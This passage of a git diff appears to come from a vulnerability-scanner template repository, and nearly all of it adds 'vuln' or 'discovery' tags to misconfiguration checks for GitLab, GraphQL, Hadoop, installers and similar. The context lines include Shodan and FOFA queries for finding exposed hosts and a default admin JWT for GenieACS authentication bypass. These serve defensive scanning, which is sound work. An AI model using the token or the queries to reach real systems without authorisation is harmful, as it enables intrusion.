tags: misconfig,fusionauth,admin,setup,vuln http: - method: GET diff --git a/http/misconfiguration/ganglia-cluster-dashboard.yaml b/http/misconfiguration/ganglia-cluster-dashboard.yaml index 039292ec1f8..f348781b690 100644 --- a/http/misconfiguration/ganglia-cluster-dashboard.yaml +++ b/http/misconfiguration/ganglia-cluster-dashboard.yaml @@ -14,7 +14,7 @@ info: vendor: ganglia product: ganglia-web shodan-query: html:"ganglia_form.submit()" - tags: misconfig,ganglia,dashboard + tags: misconfig,ganglia,dashboard,discovery http: - method: GET diff --git a/http/misconfiguration/genieacs-default-jwt.yaml b/http/misconfiguration/genieacs-default-jwt.yaml index db8c8976a73..9e6f3249dbf 100644 --- a/http/misconfiguration/genieacs-default-jwt.yaml +++ b/http/misconfiguration/genieacs-default-jwt.yaml @@ -22,7 +22,7 @@ info: fofa-query: - body="genieacs" - icon_hash=-2098066288 - tags: misconfig,jwt,genieacs,default-jwt + tags: misconfig,jwt,genieacs,default-jwt,vuln variables: cookie_name: genieacs-ui-jwt default_jwt_secret: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiYXV0aE1ldGhvZCI6ImxvY2FsIiwiaWF0IjoxNzgyNTc0NDEyfQ.y2JaygP5n4WBYQ_dytgS0qet0b6KvtT31UJWqee4L6c diff --git a/http/misconfiguration/git-web-interface.yaml b/http/misconfiguration/git-web-interface.yaml index 04d22e8a91a..1ac31f21af9 100644 --- a/http/misconfiguration/git-web-interface.yaml +++ b/http/misconfiguration/git-web-interface.yaml @@ -12,7 +12,7 @@ info: vendor: git-scm product: git shodan-query: html:"git web interface version" - tags: git,misconfig + tags: git,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/gitea-public-signup.yaml b/http/misconfiguration/gitea-public-signup.yaml index 56863447b61..d4864b53078 100644 --- a/http/misconfiguration/gitea-public-signup.yaml +++ b/http/misconfiguration/gitea-public-signup.yaml @@ -17,7 +17,7 @@ info: vendor: gitea product: gitea shodan-query: html:"Powered by Gitea" - tags: misconfig,gitea + tags: misconfig,gitea,vuln http: - method: GET diff --git a/http/misconfiguration/gitlab/gitlab-api-user-enum.yaml b/http/misconfiguration/gitlab/gitlab-api-user-enum.yaml index 19f1fb5ca38..353ad29a80b 100644 --- a/http/misconfiguration/gitlab/gitlab-api-user-enum.yaml +++ b/http/misconfiguration/gitlab/gitlab-api-user-enum.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 100 shodan-query: http.title:"GitLab" - tags: gitlab,enum,misconfig,disclosure + tags: gitlab,enum,misconfig,disclosure,vuln http: - raw: diff --git a/http/misconfiguration/gitlab/gitlab-public-repos.yaml b/http/misconfiguration/gitlab/gitlab-public-repos.yaml index 7eadcef4673..6e15a014695 100644 --- a/http/misconfiguration/gitlab/gitlab-public-repos.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-repos.yaml @@ -14,7 +14,7 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" - tags: gitlab,exposure,misconfig + tags: gitlab,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/gitlab/gitlab-public-signup.yaml b/http/misconfiguration/gitlab/gitlab-public-signup.yaml index 27359e2df16..54a43f65364 100644 --- a/http/misconfiguration/gitlab/gitlab-public-signup.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-signup.yaml @@ -11,7 +11,7 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" - tags: gitlab,misconfig + tags: gitlab,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/gitlab/gitlab-public-snippets.yaml b/http/misconfiguration/gitlab/gitlab-public-snippets.yaml index 269709b41a5..664876f0f3a 100644 --- a/http/misconfiguration/gitlab/gitlab-public-snippets.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-snippets.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"GitLab" - tags: gitlab,exposure,misconfig + tags: gitlab,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml b/http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml index ef2ce3d912a..8c3c133b69a 100644 --- a/http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml +++ b/http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"GitLab" - tags: gitlab,misconfig,unauth + tags: gitlab,misconfig,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/gitlab/gitlab-user-enum.yaml b/http/misconfiguration/gitlab/gitlab-user-enum.yaml index c5857e5ab04..8f8227d28a3 100644 --- a/http/misconfiguration/gitlab/gitlab-user-enum.yaml +++ b/http/misconfiguration/gitlab/gitlab-user-enum.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 100 shodan-query: http.title:"GitLab" - tags: gitlab,enum,misconfig,fuzz + tags: gitlab,enum,misconfig,fuzz,vuln http: - raw: diff --git a/http/misconfiguration/gitlist-disclosure.yaml b/http/misconfiguration/gitlist-disclosure.yaml index 0ce1cb46087..307f63f7c3c 100644 --- a/http/misconfiguration/gitlist-disclosure.yaml +++ b/http/misconfiguration/gitlist-disclosure.yaml @@ -12,7 +12,7 @@ info: vendor: gitlist product: gitlist shodan-query: title:"GitList" - tags: gitlist,misconfig + tags: gitlist,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/global-traffic-statistics.yaml b/http/misconfiguration/global-traffic-statistics.yaml index 69bc3146a74..68f27eb6ab3 100644 --- a/http/misconfiguration/global-traffic-statistics.yaml +++ b/http/misconfiguration/global-traffic-statistics.yaml @@ -13,7 +13,7 @@ info: vendor: f5 product: big-ip_global_traffic_manager shodan-query: title:"Global Traffic Statistics" - tags: misconfig,global,exposure + tags: misconfig,global,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/glpi-directory-listing.yaml b/http/misconfiguration/glpi-directory-listing.yaml index 888581330ae..4302e918a49 100644 --- a/http/misconfiguration/glpi-directory-listing.yaml +++ b/http/misconfiguration/glpi-directory-listing.yaml @@ -7,7 +7,7 @@ info: description: In certain cases, system administrators leave directory listing enabled which can sometimes expose sensitive files. metadata: max-request: 2 - tags: glpi,misconfig + tags: glpi,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index 02ce62c2c14..38fb33e8f81 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -16,7 +16,7 @@ info: vendor: thoughtworks product: gocd shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" - tags: go,gocd,config,exposure,misconfig + tags: go,gocd,config,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index 52ca964e933..47b16feedc8 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -16,7 +16,7 @@ info: vendor: thoughtworks product: gocd shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" - tags: go,gocd,exposure,misconfig + tags: go,gocd,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 8449d67aaf3..3e925fa299c 100644 --- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -12,7 +12,7 @@ info: vendor: thoughtworks product: gocd shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" - tags: go,gocd,unauth,misconfig + tags: go,gocd,unauth,misconfig,vuln,discovery http: - method: GET diff --git a/http/misconfiguration/google/insecure-firebase-database.yaml b/http/misconfiguration/google/insecure-firebase-database.yaml index 718fc522df4..e2e6f656e30 100644 --- a/http/misconfiguration/google/insecure-firebase-database.yaml +++ b/http/misconfiguration/google/insecure-firebase-database.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 2 - tags: firebase,google,misconfig,intrusive + tags: firebase,google,misconfig,intrusive,vuln http: - raw: diff --git a/http/misconfiguration/gopher-server.yaml b/http/misconfiguration/gopher-server.yaml index 5384287deba..0e4daf6649d 100644 --- a/http/misconfiguration/gopher-server.yaml +++ b/http/misconfiguration/gopher-server.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"Gopher Server" - tags: misconfig,gopher,server + tags: misconfig,gopher,server,vuln http: - method: GET diff --git a/http/misconfiguration/grafana-public-signup.yaml b/http/misconfiguration/grafana-public-signup.yaml index dea4f795391..8130c33a3d3 100644 --- a/http/misconfiguration/grafana-public-signup.yaml +++ b/http/misconfiguration/grafana-public-signup.yaml @@ -12,7 +12,7 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" - tags: grafana,intrusive,misconfig + tags: grafana,intrusive,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/graphql/graphql-alias-batching.yaml b/http/misconfiguration/graphql/graphql-alias-batching.yaml index 8192f90e05c..8f14e06a678 100644 --- a/http/misconfiguration/graphql/graphql-alias-batching.yaml +++ b/http/misconfiguration/graphql/graphql-alias-batching.yaml @@ -20,7 +20,7 @@ info: max-request: 2 product: playground vendor: graphql - tags: graphql,misconfig + tags: graphql,misconfig,vuln variables: str: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/misconfiguration/graphql/graphql-apollo-sandbox.yaml b/http/misconfiguration/graphql/graphql-apollo-sandbox.yaml index 7e03b3ce0e5..d2dfadc238c 100644 --- a/http/misconfiguration/graphql/graphql-apollo-sandbox.yaml +++ b/http/misconfiguration/graphql/graphql-apollo-sandbox.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Apollo Sandbox" - tags: apollo,misconfig,exposure,graphql + tags: apollo,misconfig,exposure,graphql,vuln http: - raw: diff --git a/http/misconfiguration/graphql/graphql-array-batching.yaml b/http/misconfiguration/graphql/graphql-array-batching.yaml index 69bab05849a..e7c010aa679 100644 --- a/http/misconfiguration/graphql/graphql-array-batching.yaml +++ b/http/misconfiguration/graphql/graphql-array-batching.yaml @@ -15,7 +15,7 @@ info: - https://graphql.security/ metadata: max-request: 2 - tags: graphql,misconfig + tags: graphql,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/graphql/graphql-directive-overloading.yaml b/http/misconfiguration/graphql/graphql-directive-overloading.yaml index 06a8e5e3f4e..183709ead78 100644 --- a/http/misconfiguration/graphql/graphql-directive-overloading.yaml +++ b/http/misconfiguration/graphql/graphql-directive-overloading.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 1 - tags: graphql,misconfig + tags: graphql,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/graphql/graphql-field-suggestion.yaml b/http/misconfiguration/graphql/graphql-field-suggestion.yaml index 058af3b547b..1e1a42f7c3a 100644 --- a/http/misconfiguration/graphql/graphql-field-suggestion.yaml +++ b/http/misconfiguration/graphql/graphql-field-suggestion.yaml @@ -15,7 +15,7 @@ info: - https://graphql.security metadata: max-request: 2 - tags: graphql,misconfig + tags: graphql,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/graphql/graphql-get-method.yaml b/http/misconfiguration/graphql/graphql-get-method.yaml index 9c6a819586f..f0e29cf5ab8 100644 --- a/http/misconfiguration/graphql/graphql-get-method.yaml +++ b/http/misconfiguration/graphql/graphql-get-method.yaml @@ -14,7 +14,7 @@ info: - https://graphql.security/ metadata: max-request: 2 - tags: graphql,misconfig + tags: graphql,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/graphql/graphql-playground.yaml b/http/misconfiguration/graphql/graphql-playground.yaml index ef2576a21c3..055fe21a075 100644 --- a/http/misconfiguration/graphql/graphql-playground.yaml +++ b/http/misconfiguration/graphql/graphql-playground.yaml @@ -14,7 +14,7 @@ info: vendor: graphql product: playground shodan-query: title:"GraphQL Playground" - tags: misconfig,graphql + tags: misconfig,graphql,vuln http: - method: GET diff --git a/http/misconfiguration/graphql/graphql-voyager.yaml b/http/misconfiguration/graphql/graphql-voyager.yaml index 395db12a85b..eeb110ef09d 100644 --- a/http/misconfiguration/graphql/graphql-voyager.yaml +++ b/http/misconfiguration/graphql/graphql-voyager.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 4 shodan-query: html:"voyager.min.js" - tags: misconfig,graphql,voyager + tags: misconfig,graphql,voyager,vuln http: - method: GET diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml index 5403e42534f..eaa5bfaf292 100644 --- a/http/misconfiguration/grav-register-admin.yaml +++ b/http/misconfiguration/grav-register-admin.yaml @@ -13,7 +13,7 @@ info: vendor: getgrav product: grav_admin shodan-query: title:"Grav Register Admin User" - tags: grav,register,admin,misconfig + tags: grav,register,admin,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml index bdc8128b5ad..80d91cd010d 100644 --- a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml +++ b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"H2O Flow" product: h2o vendor: h2o - tags: h2o-3,h2o,info-leak,lfi,misconfig + tags: h2o-3,h2o,info-leak,lfi,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/h2o/h2o-dashboard.yaml b/http/misconfiguration/h2o/h2o-dashboard.yaml index 10b811de7bc..518b31c3159 100644 --- a/http/misconfiguration/h2o/h2o-dashboard.yaml +++ b/http/misconfiguration/h2o/h2o-dashboard.yaml @@ -14,7 +14,7 @@ info: vendor: h2o product: h2o shodan-query: title:"H2O Flow" - tags: misconfig,exposure,h2o,ml,unauth + tags: misconfig,exposure,h2o,ml,unauth,discovery http: - method: GET diff --git a/http/misconfiguration/hadoop-unauth-rce.yaml b/http/misconfiguration/hadoop-unauth-rce.yaml index 86247d6c4f4..9130b884984 100644 --- a/http/misconfiguration/hadoop-unauth-rce.yaml +++ b/http/misconfiguration/hadoop-unauth-rce.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-306 metadata: max-request: 1 - tags: vulhub,apache,hadoop,unauth,rce,msf,misconfig + tags: vulhub,apache,hadoop,unauth,rce,msf,misconfig,vuln http: - method: POST diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index 32975715f38..ae0b09bd1d2 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -13,7 +13,7 @@ info: vendor: haproxy product: haproxy shodan-query: title:"haproxy exporter" - tags: haproxy,exposure,debug,misconfig + tags: haproxy,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/haproxy-status.yaml b/http/misconfiguration/haproxy-status.yaml index b7b73f69ba3..77c7b3a8f71 100644 --- a/http/misconfiguration/haproxy-status.yaml +++ b/http/misconfiguration/haproxy-status.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: logs,haproxy,edb,misconfig + tags: logs,haproxy,edb,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/hashicorp-consul-unauth.yaml b/http/misconfiguration/hashicorp-consul-unauth.yaml index 7139ed22adf..cc15613bd0a 100644 --- a/http/misconfiguration/hashicorp-consul-unauth.yaml +++ b/http/misconfiguration/hashicorp-consul-unauth.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: product:"Consul" - tags: hashicorp,consul,unauth,misconfig + tags: hashicorp,consul,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/healthchecks-ui-exposure.yaml b/http/misconfiguration/healthchecks-ui-exposure.yaml index 85c7e35f650..cf44dd5eb8a 100644 --- a/http/misconfiguration/healthchecks-ui-exposure.yaml +++ b/http/misconfiguration/healthchecks-ui-exposure.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Health Checks UI" - tags: misconfig,exposure + tags: misconfig,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/helm-dashboard-exposure.yaml b/http/misconfiguration/helm-dashboard-exposure.yaml index f7a1345b8fe..947b723e35d 100644 --- a/http/misconfiguration/helm-dashboard-exposure.yaml +++ b/http/misconfiguration/helm-dashboard-exposure.yaml @@ -12,7 +12,7 @@ info: vendor: helm product: helm shodan-query: http.favicon.hash:-594722214 - tags: helm,exposure,dashboard,misconfig + tags: helm,exposure,dashboard,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/hfs-exposure.yaml b/http/misconfiguration/hfs-exposure.yaml index 5af82023a1f..fd1b58f7b12 100644 --- a/http/misconfiguration/hfs-exposure.yaml +++ b/http/misconfiguration/hfs-exposure.yaml @@ -15,7 +15,7 @@ info: - title:"HFS /" - "Set-Cookie: HFS_SID_=" - http.favicon.hash:2124459909 - tags: misconfig,hfs,exposure,panel + tags: misconfig,hfs,exposure,panel,vuln http: - method: GET diff --git a/http/misconfiguration/hikvision-env.yaml b/http/misconfiguration/hikvision-env.yaml index 47d9e29b48a..5957db06076 100644 --- a/http/misconfiguration/hikvision-env.yaml +++ b/http/misconfiguration/hikvision-env.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 5 shodan-query: app="HIKVISION-综合安防管理平台" - tags: misconfig,hikvision,springboot,env + tags: misconfig,hikvision,springboot,env,vuln http: - method: GET diff --git a/http/misconfiguration/hivequeue-agent.yaml b/http/misconfiguration/hivequeue-agent.yaml index 58a123b6974..eca43b04f88 100644 --- a/http/misconfiguration/hivequeue-agent.yaml +++ b/http/misconfiguration/hivequeue-agent.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"HiveQueue" - tags: misconfig,hivequeue + tags: misconfig,hivequeue,vuln http: - method: GET diff --git a/http/misconfiguration/hp/unauthorized-hp-printer.yaml b/http/misconfiguration/hp/unauthorized-hp-printer.yaml index e7cdfaea8f2..dd51314bc0f 100644 --- a/http/misconfiguration/hp/unauthorized-hp-printer.yaml +++ b/http/misconfiguration/hp/unauthorized-hp-printer.yaml @@ -7,7 +7,7 @@ info: description: HP Printer is exposed. metadata: max-request: 1 - tags: hp,iot,unauth,misconfig + tags: hp,iot,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/hp/unauthorized-printer-hp.yaml b/http/misconfiguration/hp/unauthorized-printer-hp.yaml index 4484da7468d..e41524f578b 100644 --- a/http/misconfiguration/hp/unauthorized-printer-hp.yaml +++ b/http/misconfiguration/hp/unauthorized-printer-hp.yaml @@ -12,7 +12,7 @@ info: vendor: hp product: officejet_pro_8730_m9l80a shodan-query: http.title:"Hp Officejet pro" - tags: hp,iot,unauth,misconfig + tags: hp,iot,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/hpe-system-management-anonymous.yaml b/http/misconfiguration/hpe-system-management-anonymous.yaml index ff056210a15..1fc67262732 100644 --- a/http/misconfiguration/hpe-system-management-anonymous.yaml +++ b/http/misconfiguration/hpe-system-management-anonymous.yaml @@ -7,7 +7,7 @@ info: description: HPE system management anonymous access is enabled. metadata: max-request: 1 - tags: hp,unauth,misconfig + tags: hp,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/http-missing-security-headers.yaml b/http/misconfiguration/http-missing-security-headers.yaml index 789aeee1770..b48e8c2fea2 100644 --- a/http/misconfiguration/http-missing-security-headers.yaml +++ b/http/misconfiguration/http-missing-security-headers.yaml @@ -8,7 +8,7 @@ info: This template searches for missing HTTP security headers. The impact of these missing headers can vary. metadata: max-request: 1 - tags: misconfig,headers,generic + tags: misconfig,headers,generic,vuln http: - method: GET diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index 15ea6002ae7..b79aee394ac 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,http,https + tags: misconfig,http,https,vuln http: - method: GET diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml index 5c04a808108..b1540116108 100644 --- a/http/misconfiguration/ibm-friendly-path-exposure.yaml +++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml @@ -14,7 +14,7 @@ info: vendor: ibm product: websphere_portal shodan-query: http.html:"IBM WebSphere Portal" - tags: ibm,exposure,websphere,misconfig + tags: ibm,exposure,websphere,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index f04cf1721f1..4d25b7b44ca 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: ibm,websphere,exposure,misconfig + tags: ibm,websphere,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index f8157c58905..baa383c6c55 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -19,7 +19,7 @@ info: shodan-query: html:"imgproxy" product: imgproxy vendor: evilmartians - tags: imgproxy,unauth,misconfig + tags: imgproxy,unauth,misconfig,vuln variables: img_url: 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/375px-Google_2015_logo.svg.png' diff --git a/http/misconfiguration/ingress-nginx-valid-admission.yaml b/http/misconfiguration/ingress-nginx-valid-admission.yaml index deb3a99be53..fcec80c0a0e 100644 --- a/http/misconfiguration/ingress-nginx-valid-admission.yaml +++ b/http/misconfiguration/ingress-nginx-valid-admission.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: ssl:"ingress-nginx" port:8443 - tags: tech,kubernetes,ingress,nginx,k8s + tags: tech,kubernetes,ingress,nginx,k8s,vuln variables: string: "{{to_lower(rand_base(5))}}" diff --git a/http/misconfiguration/innovatrics-smartface-panel.yaml b/http/misconfiguration/innovatrics-smartface-panel.yaml index c470f640d73..f3a0dc01703 100644 --- a/http/misconfiguration/innovatrics-smartface-panel.yaml +++ b/http/misconfiguration/innovatrics-smartface-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-1410437493 - tags: panel,smartface,login,detect + tags: panel,smartface,login,detect,vuln flow: http(1) && http(2) diff --git a/http/misconfiguration/installer/activecollab-installer.yaml b/http/misconfiguration/installer/activecollab-installer.yaml index 4cedee4bf92..7233f1a76cb 100644 --- a/http/misconfiguration/installer/activecollab-installer.yaml +++ b/http/misconfiguration/installer/activecollab-installer.yaml @@ -16,7 +16,7 @@ info: vendor: activecollab product: activecollab shodan-query: html:"ActiveCollab Installer" - tags: misconfig,install,exposure,activecollab + tags: misconfig,install,exposure,activecollab,vuln http: - method: GET diff --git a/http/misconfiguration/installer/acunetix-360-installer.yaml b/http/misconfiguration/installer/acunetix-360-installer.yaml index 54e1f222b27..e9bb3fad327 100644 --- a/http/misconfiguration/installer/acunetix-360-installer.yaml +++ b/http/misconfiguration/installer/acunetix-360-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-347188002 - tags: misconfig,exposure,install,acunetix + tags: misconfig,exposure,install,acunetix,vuln http: - method: GET diff --git a/http/misconfiguration/installer/adguard-installer.yaml b/http/misconfiguration/installer/adguard-installer.yaml index 0772e20efba..e3990a86dae 100644 --- a/http/misconfiguration/installer/adguard-installer.yaml +++ b/http/misconfiguration/installer/adguard-installer.yaml @@ -14,7 +14,7 @@ info: vendor: adguard product: adguard fofa-query: title="Setup AdGuard Home" - tags: adguard,misconfig,install + tags: adguard,misconfig,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/akeeba-installer.yaml b/http/misconfiguration/installer/akeeba-installer.yaml index af25cad6dcf..216b65760c0 100644 --- a/http/misconfiguration/installer/akeeba-installer.yaml +++ b/http/misconfiguration/installer/akeeba-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"Akeeba Backup" - tags: misconfig,akeeba,install,exposure + tags: misconfig,akeeba,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/alma-installer.yaml b/http/misconfiguration/installer/alma-installer.yaml index da96ed0eb07..4d817ef96e4 100644 --- a/http/misconfiguration/installer/alma-installer.yaml +++ b/http/misconfiguration/installer/alma-installer.yaml @@ -13,7 +13,7 @@ info: vendor: almapay product: alma shodan-query: title:"Alma Installation" - tags: misconfig,alma,install,exposure + tags: misconfig,alma,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ampache-music-installer.yaml b/http/misconfiguration/installer/ampache-music-installer.yaml index 94e6c2748b7..f471bf4fb83 100644 --- a/http/misconfiguration/installer/ampache-music-installer.yaml +++ b/http/misconfiguration/installer/ampache-music-installer.yaml @@ -13,7 +13,7 @@ info: vendor: ampache product: ampache shodan-query: title:"For the Love of Music - Installation" - tags: misconfig,ampache,install,exposure + tags: misconfig,ampache,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml index 90dbfa3c853..2052a3705e3 100644 --- a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml +++ b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml @@ -13,7 +13,7 @@ info: vendor: atlassian product: bamboo shodan-query: title:"Bamboo setup wizard" - tags: misconfig,atlassian,bamboo,setup,installer + tags: misconfig,atlassian,bamboo,setup,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/avideo-install.yaml b/http/misconfiguration/installer/avideo-install.yaml index d2483cc0c28..81754eb89b9 100644 --- a/http/misconfiguration/installer/avideo-install.yaml +++ b/http/misconfiguration/installer/avideo-install.yaml @@ -17,7 +17,7 @@ info: fofa-query: "AVideo" product: avideo vendor: wwbn - tags: panel,install,avideo,misconfig + tags: panel,install,avideo,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/bagisto-installer.yaml b/http/misconfiguration/installer/bagisto-installer.yaml index 74978ad9d16..7266d616437 100644 --- a/http/misconfiguration/installer/bagisto-installer.yaml +++ b/http/misconfiguration/installer/bagisto-installer.yaml @@ -13,7 +13,7 @@ info: vendor: webkul product: bagisto shodan-query: http.title:"Bagisto Installer" - tags: misconfig,bagisto,install,exposure + tags: misconfig,bagisto,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/basercms-install.yaml b/http/misconfiguration/installer/basercms-install.yaml index fbeee5ab993..0cc42cc48a8 100644 --- a/http/misconfiguration/installer/basercms-install.yaml +++ b/http/misconfiguration/installer/basercms-install.yaml @@ -20,7 +20,7 @@ info: product: baserCMS shodan-query: http.favicon.hash:-236105569 fofa-query: app="baserCMS" - tags: misconfig,install,basercms,cms,exposure + tags: misconfig,install,basercms,cms,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/bigant-db-install.yaml b/http/misconfiguration/installer/bigant-db-install.yaml index 1dd8e894ce8..c67c1a0d0f6 100644 --- a/http/misconfiguration/installer/bigant-db-install.yaml +++ b/http/misconfiguration/installer/bigant-db-install.yaml @@ -10,7 +10,7 @@ info: verified: true fofa-query: body="BigAntSetup" max-request: 1 - tags: misconfig,install,bigant,database + tags: misconfig,install,bigant,database,vuln http: - raw: diff --git a/http/misconfiguration/installer/binom-installer.yaml b/http/misconfiguration/installer/binom-installer.yaml index 6b33c7ace80..21a1ba08e9a 100644 --- a/http/misconfiguration/installer/binom-installer.yaml +++ b/http/misconfiguration/installer/binom-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 2 shodan-query: title:"Install Binom" - tags: misconfig,binom,install,exposure + tags: misconfig,binom,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/bitrix24-installer.yaml b/http/misconfiguration/installer/bitrix24-installer.yaml index 4d44b9f9662..af643bbb79d 100644 --- a/http/misconfiguration/installer/bitrix24-installer.yaml +++ b/http/misconfiguration/installer/bitrix24-installer.yaml @@ -13,7 +13,7 @@ info: vendor: bitrix24 product: bitrix24 shodan-query: http.favicon.hash:-2115208104 - tags: misconfig,bitrix24,install,exposure + tags: misconfig,bitrix24,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/blesta-installer.yaml b/http/misconfiguration/installer/blesta-installer.yaml index c8faea8bc50..47382b8ec40 100644 --- a/http/misconfiguration/installer/blesta-installer.yaml +++ b/http/misconfiguration/installer/blesta-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"Blesta installer" - tags: misconfig,blesta,install,exposure + tags: misconfig,blesta,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/businesso-installer.yaml b/http/misconfiguration/installer/businesso-installer.yaml index 0d97bb6f5e0..35690f2ad67 100644 --- a/http/misconfiguration/installer/businesso-installer.yaml +++ b/http/misconfiguration/installer/businesso-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 shodan-query: title:"Businesso Installer" fofa-query: title="Businesso Installer" - tags: misconfig,businesso,install,exposure + tags: misconfig,businesso,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index 